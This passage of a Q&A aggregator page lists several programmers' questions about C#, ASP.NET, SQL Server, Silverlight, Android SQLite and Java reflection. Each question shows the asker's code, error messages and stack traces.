System.AppDomain.UnmarshalObject(Byte[] blob) For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp." Using FUSLOGVW.exe (i.e., Assembly Binding Log Viewer), I can see the problem is that IIS attempts to find MyThirdPartyLibrary in directory C:\windows\system32\inetsrv. It refuses to look in the bin folder of the web app, where the DLL is actually located. Does anyone know what the problem is? Thanks, Calvin

    Read the article

  • object reference not set to an instance of object exception coming at runtime.

    - by amby
    Hi, I am getting this error at runtime: object reference not set to an instance of object my question is that am i using stringbuilder array correctly here. Because I am new in C#. and i think its the problem with my stringbuilder array. Below is the code: using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Services; using System.Web.UI; using System.Web.UI.WebControls; using System.Data; using System.Text; using System.Web.Script.Serialization; using System.Web.Script.Services; using System.Collections; public partial class Testing : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { } [WebMethod] public static string SendMessage() { try { al2c00.ldap ws = new al2c00.ldap(); Hashtable htPeople = new Hashtable(); //DataTable dt = ws.GetEmployeeDetailsBy_NTID("650FA25C-9561-430B-B757-835D043EA5E5", "john"); StringBuilder[] empDetails = new StringBuilder[100]; string num = "ambreen"; empDetails[0].Append("amby"); num = empDetails[0].ToString(); htPeople.Add("bellempposreport", num); JavaScriptSerializer jss = new JavaScriptSerializer(); string output = jss.Serialize(htPeople); return output; } catch(Exception ex) { return ex.Message + "-" + ex.StackTrace; } } } please reply me what i am doing wrong here.

    Read the article

  • C# Error reading two dates from a binary file

    - by Jamie
    Hi all, When reading two dates from a binary file I'm seeing the error below: "The output char buffer is too small to contain the decoded characters, encoding 'Unicode (UTF-8)' fallback 'System.Text.DecoderReplacementFallback'. Parameter name: chars" My code is below: static DateTime[] ReadDates() { System.IO.FileStream appData = new System.IO.FileStream( appDataFile, System.IO.FileMode.Open, System.IO.FileAccess.Read); List<DateTime> result = new List<DateTime>(); using (System.IO.BinaryReader br = new System.IO.BinaryReader(appData)) { while (br.PeekChar() > 0) { result.Add(new DateTime(br.ReadInt64())); } br.Close(); } return result.ToArray(); } static void WriteDates(IEnumerable<DateTime> dates) { System.IO.FileStream appData = new System.IO.FileStream( appDataFile, System.IO.FileMode.Create, System.IO.FileAccess.Write); List<DateTime> result = new List<DateTime>(); using (System.IO.BinaryWriter bw = new System.IO.BinaryWriter(appData)) { foreach (DateTime date in dates) bw.Write(date.Ticks); bw.Close(); } } What could be the cause? Thanks

    Read the article

  • Android SQLite Problem: Program Crash When Try a Query!

    - by Skatephone
    Hi i have a problem programming with android SDK 1.6. I'm doing the same things of the "notepad exaple" but the programm crash when i try some query. If i try to do a query directly in to the DatabaseHelper create() metod it goes, but out of this function it doesn't. Do you have any idea? this is the source: public class DbAdapter { public static final String KEY_NAME = "name"; public static final String KEY_TOT_DAYS = "totdays"; public static final String KEY_ROWID = "_id"; private static final String TAG = "DbAdapter"; private DatabaseHelper mDbHelper; private SQLiteDatabase mDb; private static final String DATABASE_NAME = "flowratedb"; private static final String DATABASE_TABLE = "girl_data"; private static final String DATABASE_TABLE_2 = "girl_cyle"; private static final int DATABASE_VERSION = 2; /** * Database creation sql statement */ private static final String DATABASE_CREATE = "create table "+DATABASE_TABLE+" (id integer, name text not null, totdays int);"; private static final String DATABASE_CREATE_2 = "create table "+DATABASE_TABLE_2+" (ref_id integer, day long not null);"; private final Context mCtx; private static class DatabaseHelper extends SQLiteOpenHelper { DatabaseHelper(Context context) { super(context, DATABASE_NAME, null, DATABASE_VERSION); } @Override public void onCreate(SQLiteDatabase db) { db.execSQL(DATABASE_CREATE); db.execSQL(DATABASE_CREATE_2); db.delete(DATABASE_TABLE, null, null); db.delete(DATABASE_TABLE_2, null, null); } @Override public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) { Log.w(TAG, "Upgrading database from version " + oldVersion + " to " + newVersion + ", which will destroy all old data"); db.execSQL("DROP TABLE IF EXISTS "+DATABASE_TABLE); db.execSQL("DROP TABLE IF EXISTS "+DATABASE_TABLE_2); onCreate(db); } } public DbAdapter(Context ctx) { this.mCtx = ctx; } public DbAdapter open() throws SQLException { mDbHelper = new DatabaseHelper(mCtx); mDb = mDbHelper.getWritableDatabase(); return this; } public void close() { mDbHelper.close(); } public long createGirl(int id,String name, int totdays) { ContentValues initialValues = new ContentValues(); initialValues.put(KEY_ROWID, id); initialValues.put(KEY_NAME, name); initialValues.put(KEY_TOT_DAYS, totdays); return mDb.insert(DATABASE_TABLE, null, initialValues); } public long createGirl_fd_day(int refid, long fd) { ContentValues initialValues = new ContentValues(); initialValues.put("ref_id", refid); initialValues.put("calendar", fd); return mDb.insert(DATABASE_TABLE, null, initialValues); } public boolean updateGirl(int rowId, String name, int totdays) { ContentValues args = new ContentValues(); args.put(KEY_NAME, name); args.put(KEY_TOT_DAYS, totdays); return mDb.update(DATABASE_TABLE, args, KEY_ROWID + "=" + rowId, null) > 0; } public boolean deleteGirlsData() { if (mDb.delete(DATABASE_TABLE_2, null, null)>0) if(mDb.delete(DATABASE_TABLE, null, null)>0) return true; return false; } public Bundle fetchAllGirls() { Bundle extras = new Bundle(); Cursor cur = mDb.query(DATABASE_TABLE, new String[] {KEY_ROWID, KEY_NAME, KEY_TOT_DAYS}, null, null, null, null, null); cur.moveToFirst(); int tot = cur.getCount(); extras.putInt("tot", tot); int index; for (int i=0;i<tot;i++){ index=cur.getInt(cur.getColumnIndex("_id")); extras.putString("name"+index, cur.getString(cur.getColumnIndex("name"))); extras.putInt("totdays"+index, cur.getInt(cur.getColumnIndex("totdays"))); } cur.close(); return extras; } public Cursor fetchGirl(int rowId) throws SQLException { Cursor mCursor = mDb.query(true, DATABASE_TABLE, new String[] {KEY_ROWID, KEY_NAME, KEY_TOT_DAYS}, KEY_ROWID + "=" + rowId, null, null, null, null, null); if (mCursor != null) { mCursor.moveToFirst(); } return mCursor; } public Cursor fetchGirlCD(int rowId) throws SQLException { Cursor mCursor = mDb.query(true, DATABASE_TABLE_2, new String[] {"ref_id", "day"}, "ref_id=" + rowId, null, null, null, null, null); if (mCursor != null) { mCursor.moveToFirst(); } return mCursor; } } Tank's Valerio From Italy :)

    Read the article

  • Silverlight and WCF Ria Services

    - by Flex_Addicted
    Hi guys, I've created a new Silverlight 3 Business Application with VS 2008. The creation has completed correctly. When I try to open the xaml, it opens but in meanwhile this error is shown: Failed to load metadata assembly System.Windows.Controls.Data.Input.Design, Version=2.0.5.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35. Exception message: Unable to load one or more of the requested types. Retrieve the LoaderExceptions property for more information.. Stack Trace: at System.Reflection.Module._GetTypesInternal(StackCrawlMark& stackMark) at System.Reflection.Assembly.GetTypes() at MS.Internal.Package.MetadataLoader.RegisterDesignTimeMetadata(Assembly assembly, LogCallback logger)An exception of type ArgumentNullException was caught when calling IRegisterMetadata on type System.Windows.Controls.Data.Input.VisualStudio.Design.MetadataRegistration. Exception Message: Value cannot be null. Parameter name: type. Stack Trace: at Microsoft.Windows.Design.Metadata.AttributeTableBuilder.AddCallback(Type type, AttributeCallback callback) at System.Windows.Controls.Data.Input.VisualStudio.Design.MetadataRegistration.AddAttributes(AttributeTableBuilder builder) at System.Windows.Controls.Design.Common.MetadataRegistrationBase.BuildAttributeTable() at System.Windows.Controls.Data.Input.VisualStudio.Design.MetadataRegistration.Register() at MS.Internal.Package.MetadataLoader.RegisterDesignTimeMetadata(Assembly assembly, LogCallback logger)Failed to load metadata assembly System.Windows.Controls.Design, Version=2.0.5.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35. Exception message: Unable to load one or more of the requested types. Retrieve the LoaderExceptions property for more information.. Stack Trace: at System.Reflection.Module._GetTypesInternal(StackCrawlMark& stackMark) at System.Reflection.Assembly.GetTypes() at MS.Internal.Package.MetadataLoader.RegisterDesignTimeMetadata(Assembly assembly, LogCallback logger)Failed to load metadata assembly System.Windows.Controls.Navigation.Design, Version=2.0.5.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35. Exception message: Unable to load one or more of the requested types. Retrieve the LoaderExceptions property for more information.. Stack Trace: at System.Reflection.Module._GetTypesInternal(StackCrawlMark& stackMark) at System.Reflection.Assembly.GetTypes() at MS.Internal.Package.MetadataLoader.RegisterDesignTimeMetadata(Assembly assembly, LogCallback logger) Why? Any solutions? Thank you in advance.

    Read the article

  • sql exception arithmetic overflow?

    - by MyHeadHurts
    In my program the user imports a date and it works whenever the year is in 2011 but if i try a date in 2010 i get this error which is weird [ SqlException (0x80131904): Arithmetic overflow error converting int to data type numeric.] System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +1950890 System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +4846875 System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +194 System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2392 System.Data.SqlClient.SqlDataReader.HasMoreRows() +157 System.Data.SqlClient.SqlDataReader.ReadInternal(Boolean setTimeout) +197 System.Data.SqlClient.SqlDataReader.Read() +9 System.Data.Common.DataAdapter.FillLoadDataRow(SchemaMapping mapping) +78 System.Data.Common.DataAdapter.FillFromReader(DataSet dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +164 System.Data.Common.DataAdapter.Fill(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +282 System.Data.Common.LoadAdapter.FillFromReader(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +19 System.Data.DataTable.Load(IDataReader reader, LoadOption loadOption, FillErrorEventHandler errorHandler) +222 System.Data.DataTable.Load(IDataReader reader) +14 ( @YearToGet int, @current datetime, @y int, @search datetime ) AS SET @YearToGet = 2006; WITH Years AS ( SELECT DATEPART(year, GETDATE()) [Year] UNION ALL SELECT [Year]-1 FROM Years WHERE [Year]>@YearToGet ), q_00 as ( select DIVISION , DYYYY , sum(PARTY) as asofPAX , sum(InsAmount) as asofSales from dbo.B101BookingsDetails INNER JOIN Years ON B101BookingsDetails.DYYYY = Years.Year where Booked <= CONVERT(int, DateAdd(year, (Years.Year - @y), @search)) and DYYYY = Years.Year group by DIVISION, DYYYY, years.year having DYYYY = years.year ), q_01 as ( select DIVISION , DYYYY , sum(PARTY) as YEPAX , sum(InsAmount) as YESales from dbo.B101BookingsDetails INNER JOIN Years ON B101BookingsDetails.DYYYY = Years.Year group by DIVISION, DYYYY , years.year having DYYYY = years.year ), q_02 as ( select DIVISION , DYYYY , sum(PARTY) as CurrentPAX , sum(InsAmount) as CurrentSales from dbo.B101BookingsDetails INNER JOIN Years ON B101BookingsDetails.DYYYY = Years.Year where Booked <= CONVERT(int,@current) and DYYYY = (year( getdate() )) group by DIVISION, DYYYY ) select a.DIVISION , a.DYYYY , asofPAX , asofSales , YEPAX , YESales , CurrentPAX , CurrentSales ,asofsales/ ISNULL(NULLIF(yesales,0),1) as percentsales, CAST((asofpax) AS DECIMAL(5,1))/yepax as percentpax from q_00 as a join q_01 as b on (b.DIVISION = a.DIVISION and b.DYYYY = a.DYYYY) join q_02 as c on (b.DIVISION = c.DIVISION) JOIN Years as d on (b.dyyyy = d.year) where A.DYYYY <> (year( getdate() )) order by a.DIVISION, a.DYYYY ;

    Read the article

  • Custom pager in my Gridview 1st time works, next doesn't :

    - by gre3ns0ul
    Hi guys, i'm with one strange problem. I am extending a control from a Gridview, and adding a dropdown to paging to the page i want. In my custom gridview i added a ITemplate than contains 4 image buttons and one dropdownlist (4 images - 1st, prev, next, last) (1 ddl - to page) and add him to my custom gridview.. I added a selectindexchange event to dropdown, to fire when a index is changed The problem is: The first time i load the page with my control it is really ok.. but when i change index, in debug i see to run constructor of control, creating footer template, and guess.. the method of indexchange isn't fired and returns an exception saying: Unable to cast object of type 'System.Web.UI.WebControls.ImageButton' to type 'System.Web.UI.WebControls.Table'. [InvalidCastException: Unable to cast object of type 'System.Web.UI.WebControls.ImageButton' to type 'System.Web.UI.WebControls.Table'.] System.Web.UI.WebControls.GridView.PrepareControlHierarchy() +122 System.Web.UI.WebControls.GridView.Render(HtmlTextWriter writer, Boolean renderPanel) +50 System.Web.UI.WebControls.GridView.Render(HtmlTextWriter writer) +33 System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +27 System.Web.UI.Control.RenderControl(HtmlTextWriter writer, ControlAdapter adapter) +99 System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +25 System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +134 System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +19 System.Web.UI.Control.Render(HtmlTextWriter writer) +10 ... apreciate for the help, thanks

    Read the article

  • Generate java class and call it's method dynamically

    - by Jacob
    package reflection; import java.io.*; import java.lang.reflect.*; class class0 { public void writeout0() { System.out.println("class0"); } } class class1 { public void writeout1() { System.out.println("class1"); } } class class2 { public void writeout2() { System.out.println("class2"); } } class class3 { public void run() { try { BufferedReader reader= new BufferedReader(new InputStreamReader (System.in)); String line=reader.readLine(); Class cls=Class.forName(line); //define method here } catch(Exception ee) { System.out.println("here "+ee); } } public void writeout3() { System.out.println("class3"); } } class class4 { public void writeout4() { System.out.println("class4"); } } class class5 { public void writeout5() { System.out.println("class5"); } } class class6 { public void writeout6() { System.out.println("class6"); } } class class7 { public void writeout7() { System.out.println("class7"); } } class class8 { public void writeout8() { System.out.println("class8"); } } class class9 { public void writeout9() { System.out.println("class9"); } } class testclass { public static void main(String[] args) { System.out.println("Write class name : "); class3 example=new class3(); example.run(); } } Question is ; third class will read the name of the class as String from console. Upon reading the name of the class, it will automatically and dynamically generate that class and call its writeout method.If that class is not read from input, it will not be initialized. but I can't continue any more ; i need to more something for 3.class, what can i do? Thanks;

    Read the article

  • Connect to a remote Oracle 11g server using OracleClient of .NET 2.0

    - by Raghu M
    I have to connect to a Oracle server on the network using a .NET / C# (Winform) application. I am trying to use System.Data.OracleClient but in vain. Here are the details I can possibly think of (that might help someone reading this question): Platform: Visual Studio 2005 / .NET 2.0 with C# on Windows Vista Home Premium Library: System.Data.OracleClient Server: Oracle 11g (located on the same LAN) Please note that I don't have Oracle installed locally and I have hunted every discussion forum possible for help - but most of them assume local Oracle installation! Here is my connection string: "User Id=TSUSER;Password=ts12TS;Data Source=(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=MyServerIP)(PORT=1521))(CONNECT_DATA=(SERVICE_NAME=ORCL)));" And I get this error: OCIEnvCreate failed with return code -1 but error message text was not available. Stack trace: at System.Data.OracleClient.OciHandle..ctor(OciHandle parentHandle, HTYPE handleType, MODE ocimode, HANDLEFLAG handleflags) at System.Data.OracleClient.OracleInternalConnection.OpenOnLocalTransaction(String userName, String password, String serverName, Boolean integratedSecurity, Boolean unicode, Boolean omitOracleConnectionName) at System.Data.OracleClient.OracleInternalConnection..ctor(OracleConnectionString connectionOptions) at System.Data.OracleClient.OracleConnectionFactory.CreateConnection(DbConnectionOptions options, Object poolGroupProviderInfo, DbConnectionPool pool, DbConnection owningObject) at System.Data.ProviderBase.DbConnectionFactory.CreatePooledConnection(DbConnection owningConnection, DbConnectionPool pool, DbConnectionOptions options) at System.Data.ProviderBase.DbConnectionPool.CreateObject(DbConnection owningObject) at System.Data.ProviderBase.DbConnectionPool.UserCreateRequest(DbConnection owningObject) at System.Data.ProviderBase.DbConnectionPool.GetConnection(DbConnection owningObject) at System.Data.ProviderBase.DbConnectionFactory.GetConnection(DbConnection owningConnection) at System.Data.ProviderBase.DbConnectionClosed.OpenConnection(DbConnection outerConnection, DbConnectionFactory connectionFactory) at System.Data.OracleClient.OracleConnection.Open() at DGKit.Util.DataUtil.Generate() in D:\SVNRoot\sandbox\DGDev\Util\DataUtil.cs:line 68

    Read the article

  • Intermittent asp.net mvc exception: “A public action method ABC could not be found on controller XYZ

    - by Chris Schoon
    Hi, I'm getting an intermittent exception saying that asp.net mvc can’t find the action method. Here’s the exception: A public action method 'Fill' could not be found on controller 'Schoon.Form.Web.Controllers.ChrisController'. I think I have the routing set up correctly because this application works most of the time. Here is the controller’s action method. [ActionName("Fill")] [AcceptVerbs(HttpVerbs.Get | HttpVerbs.Post), UserIdFilter, DTOFilter] public ActionResult Fill(int userId, int subscriberId, DisplayMode? mode) { //… } The route: routes.MapRoute( "SchoonForm", "Form/Fill/{subscriberId}", new { controller = "ChrisController", action = "Fill" }, new { subscriberId = @"\d+" } ); And here is the stack: System.Web.HttpException: A public action method 'Fill' could not be found on controller 'Schoon.Form.Web.Controllers.ChrisController'. at System.Web.Mvc.Controller.HandleUnknownAction(String actionName) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\Controller.cs:line 197 at System.Web.Mvc.Controller.ExecuteCore() in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\Controller.cs:line 164 at System.Web.Mvc.ControllerBase.Execute(RequestContext requestContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\ControllerBase.cs:line 76 at System.Web.Mvc.ControllerBase.System.Web.Mvc.IController.Execute(RequestContext requestContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\ControllerBase.cs:line 87 at System.Web.Mvc.MvcHandler.ProcessRequest(HttpContextBase httpContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\MvcHandler.cs:line 80 at System.Web.Mvc.MvcHandler.ProcessRequest(HttpContext httpContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\MvcHandler.cs:line 68 at System.Web.Mvc.MvcHandler.System.Web.IHttpHandler.ProcessRequest(HttpContext httpContext) in C:\dev\ThirdParty\MvcDev\src\SystemWebMvc\Mvc\MvcHandler.cs:line 104 at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) Here is an example of my filters they all work the same way: public class UserIdFilter : ActionFilterAttribute { public override void OnActionExecuting(ActionExecutingContext filterContext) { const string Key = "userId"; if (filterContext.ActionParameters.ContainsKey(Key)) { filterContext.ActionParameters[Key] = // get the user id from session or cookie } base.OnActionExecuting(filterContext); } } Thanks, Chris

    Read the article

  • How to get more detail from an exception?

    - by cusimar9
    I have a .NET 4.0 web application which implements an error handler within the Application_Error event of Global.asax. When an exception occurs this intercepts it and sends me an email including a variety of information like the logged in user, the page the error occurred on, the contents of the session etc. This is all great but there is some fundamental detail missing which I seem unable to locate. For instance, this is a subset of an error I would receive and the associated stack trace: Source: Telerik.Web.UI Message: Selection out of range Parameter name: value Stack trace: at Telerik.Web.UI.RadComboBox.PerformDataBinding(IEnumerable dataSource) at Telerik.Web.UI.RadComboBox.OnDataSourceViewSelectCallback(IEnumerable data) at System.Web.UI.DataSourceView.Select(DataSourceSelectArguments arguments, DataSourceViewSelectCallback callback) at Telerik.Web.UI.RadComboBox.OnDataBinding(EventArgs e) at Telerik.Web.UI.RadComboBox.PerformSelect() at System.Web.UI.WebControls.BaseDataBoundControl.DataBind() at Telerik.Web.UI.RadComboBox.DataBind() at System.Web.UI.WebControls.BaseDataBoundControl.EnsureDataBound() at Telerik.Web.UI.RadComboBox.OnPreRender(EventArgs e) at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Control.PreRenderRecursiveInternal() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) Now as lovely as this is I could do with knowing a) the name of the control and b) the value which caused the control to be 'out of range'. Any suggestions about how I could get this sort of information? I've run this in debug mode and the objects passed to Global.asax don't seem to hold any more detail that I can see.

    Read the article

  • How to Make my application handle Errors for a few different scenarios?

    - by NightsEVil
    so i have this code to extract a program to the temp directory then run it, the problem is it doesn't work perfectly on every computer (for some reason it hits a error or exception sometimes) string tempFolder = System.IO.Path.Combine(System.IO.Path.GetTempPath(), ""); System.Diagnostics.Process defrag1 = System.Diagnostics.Process.Start(@"Programs\Optimize\AusLogics_Defrag.exe", string.Format(" -o{0} -y", tempFolder)); defrag1.WaitForExit(); string executableDirectoryName = Path.GetDirectoryName(Application.ExecutablePath); System.Diagnostics.Process defrag2 = System.Diagnostics.Process.Start(tempFolder + "\\" + "AusLogics_Defrag" + "\\" + "DiskDefrag.exe", ""); defrag2.WaitForExit(); System.IO.Directory.Delete(tempFolder + "\\" + "AusLogics_Defrag", true); and what i wanna know is there a way that say if it starts to extract but hits a error (no matter what it is) it will automatically change and go to this code, but if it DOESN'T hit a error it continues as it was meant to? string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); System.Diagnostics.Process defrag1 = System.Diagnostics.Process.Start(@"Programs\Optimize\AusLogics_Defrag.exe", string.Format(" -o{0} -y", tempFolder)); defrag1.WaitForExit(); string executableDirectoryName = Path.GetDirectoryName(Application.ExecutablePath); System.Diagnostics.Process defrag2 = System.Diagnostics.Process.Start(tempFolder + "\\" + "AusLogics_Defrag" + "\\" + "DiskDefrag.exe", ""); defrag2.WaitForExit(); System.IO.Directory.Delete(tempFolder + "\\" + "AusLogics_Defrag", true); with the path going to the application data folder? and if THAT hits a error it would change that path to this, but if it DOESN'T hit a error it continues as it was meant to? string tempFolder = System.Environment.GetEnvironmentVariable("HomeDrive");

    Read the article

< Previous Page | 628 629 630 631 632 633 634 635 636 637 638 639  | Next Page >